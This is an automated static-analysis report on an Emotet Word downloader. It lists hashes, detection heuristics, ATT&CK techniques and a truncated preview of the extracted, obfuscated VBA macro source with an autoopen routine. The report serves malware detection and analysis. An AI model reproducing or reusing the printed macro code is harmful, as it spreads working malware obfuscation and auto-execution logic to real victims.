Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 ce9a9f8bf2b7042b…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 249.4 KB
Created: 2019-04-24 06:30:00
Authoring application: Microsoft Office Word
First seen: 2020-06-01
MD5: 73c5054b183596825e3c5ab9b044de3e
SHA-1: f073f58471bc029a9e3af6322bfd94bfb426876e
SHA-256: ce9a9f8bf2b7042befa0fca4a99e8ec872a93ff80f66c650292b8c8a867ee516
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word document containing VBA macros, specifically an AutoOpen macro. The ClamAV detection and heuristic firings strongly indicate this is an Emotet downloader. The VBA code, though obfuscated, likely executes a second-stage payload, a common Emotet behavior.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6954531-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6954531-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  22822 bytes
SHA-256 (macros.bas): 7fde3b87aa6f19e205feb7d2cfa9900da465bb29f47ead155e7aa5439acbac8c
Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "GUAxZo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rCQAkUA"
Attribute VB_Base = "0{0A5FB00E-D718-41CC-9F16-C8FEF46C3ACD}{61BC3D54-1463-4DFA-B77B-B2799E590BA5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "EABZoB"
Attribute VB_Base = "0{11FC309E-2A75-4B67-9F01-3E8C9F3E2515}{A7E125F1-6AFA-4095-8EDC-90FEA386D702}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wDZUDUG"
Sub autoopen()
   If CB_CCB = FC4wxA Then
ElseIf BQwAACoU = dUkGDZx Then
            soAQAc = Atn(819075654)
ElseIf IwQAAUD4 = vDcQUZA4 Then
            skw_4Ac = Int(963430733)
ElseIf wZAAQx = mUA_wDG Then
End If
   If ZAoGDk = B_ABQcXQ Then
ElseIf B_AAQA = iDoAAAD Then
            nxAAAxo1 = Atn(828064624)
ElseIf pDQAA1 = WAZkcB_ Then
            tUwQCxAZ = Int(882581804)
ElseIf XAAUAQAB = zACAkA Then
End If
ZA1A1o
   If iADGAQAo = YAB_1Z Then
ElseIf dQoAxAAA = qAADACAZ Then
            IA1_QCX = Atn(56278449)
ElseIf iBCCQUxB = UBACAA Then
            I4BAxD = Int(814365295)
ElseIf VxAkwk = NUw4_CA Then
End If
   If HoA1Awoc = j4wAXXD Then
ElseIf wAA4U4 = mX1xAGAZ Then
            jQXBkkBA = Atn(658159943)
ElseIf jDAUU4 = OUGUQkAQ Then
            w1AZwUcC = Int(370010936)
ElseIf oACABk = fkDUQU Then
End If
   If k1QBAAcB = QAG1A_wD Then
ElseIf UAcACU = aQUZGG Then
            FQZAoGB = Atn(82985107)
ElseIf NCcAwB = PAADoA Then
            RkAABxkx = Int(371206787)
ElseIf H1AooQok = NBQ1AD Then
End If
End Sub

Attribute VB_Name = "iZDUADAo"
Function ZA1A1o()
On Error Resume Next
   If jUcwc_X = i1A4QAU Then
ElseIf ZcXAkA = FcBAc_BZ Then
            IcAcCADU = Atn(949354556)
ElseIf wAQcQ4U = NAxcDwA Then
            pBDG4AAA = Int(494392853)
ElseIf IAkC_Xw = KoA1AAw Then
End If
   If WAAAXXAA = Z_QwAA_Z Then
ElseIf Z1oQA1XC = M4BAA4 Then
            rQcDokA = Atn(947336719)
ElseIf JAUAQAA = lUAxADcA Then
            vAUDcAD = Int(789772380)
ElseIf nUG4GQw = DG11ADQA Then
End If
   If uc4BADoB = BkXQDA1 Then
ElseIf CDDBkA = bAUAZGD Then
            SQADAAA = Atn(74170508)
ElseIf qA_ADCA = qAZABAD Then
            CZ_DA4UQ = Int(882683139)
ElseIf WDZDcAA = jZ_UUUAB Then
End If
If 6831 < 10238 Then
IUxAxDZX = vbFalse
   If HDAA_xA = P4AZXA_ Then
ElseIf EZADQ14 = PCBwoA Then
            hCBAkC = Atn(510635420)
ElseIf jkAQxA = sQ4ABQ Then
            rAcxDA = Int(876982222)
ElseIf zQBDcB = RAZ4A1 Then
End If
   If MAADAXZG = GAkwUA Then
ElseIf TAAACXA = RGUkAcA1 Then
            AGQABAC = Atn(479776790)
ElseIf QCDAkAow = zU4XAcA Then
            OBAUA4 = Int(794516148)
ElseIf oxcUB4G = NcoDAkZ Then
End If
End If
   If dAkA4UB = hAABAwkc Then
ElseIf HAADAABU = bUkwDA Then
            jUCAA4w = Atn(679450840)
ElseIf IcA1A1 = qXCxAxB Then
            vAZwc4 = Int(518584356)
ElseIf ukQABZc = AGwBBAQ Then
End If
   If fZD_ACA = L1AXA_A Then
ElseIf oAADDwZG = KA4cUXUA Then
            R4DAQAA1 = Atn(121404134)
ElseIf EZ_DAAAU = nAc4k41B Then
            BZUBAAD = Int(585375453)
ElseIf KQGUDCA4 = IxABB1k_ Then
End If
   If EAAoACZ = RAUUxU1Q Then
ElseIf wDA1BAA = nAwUAZDZ Then
            pQxAUDw = Atn(750990392)
ElseIf mQBk1xD = iDBBBw Then
            bAwGA1 = Int(233546605)
ElseIf wAQX4AcB = CDA4AAA_ Then
End If
S4AA1QUA = EABZoB.bXZoUABG + EABZoB.CAAAAAAB
   If UBXooo = KAA1AA Then
ElseIf ukDQQ_C = dDkUDZA_ Then
            V4_AAUD = Atn(505078683)
ElseIf jABAoAA = mC4_oAAC Then
            nAAZXwBA = Int(971430846)
ElseIf HCAA1A = bA_DUUQ Then
End I
... (truncated)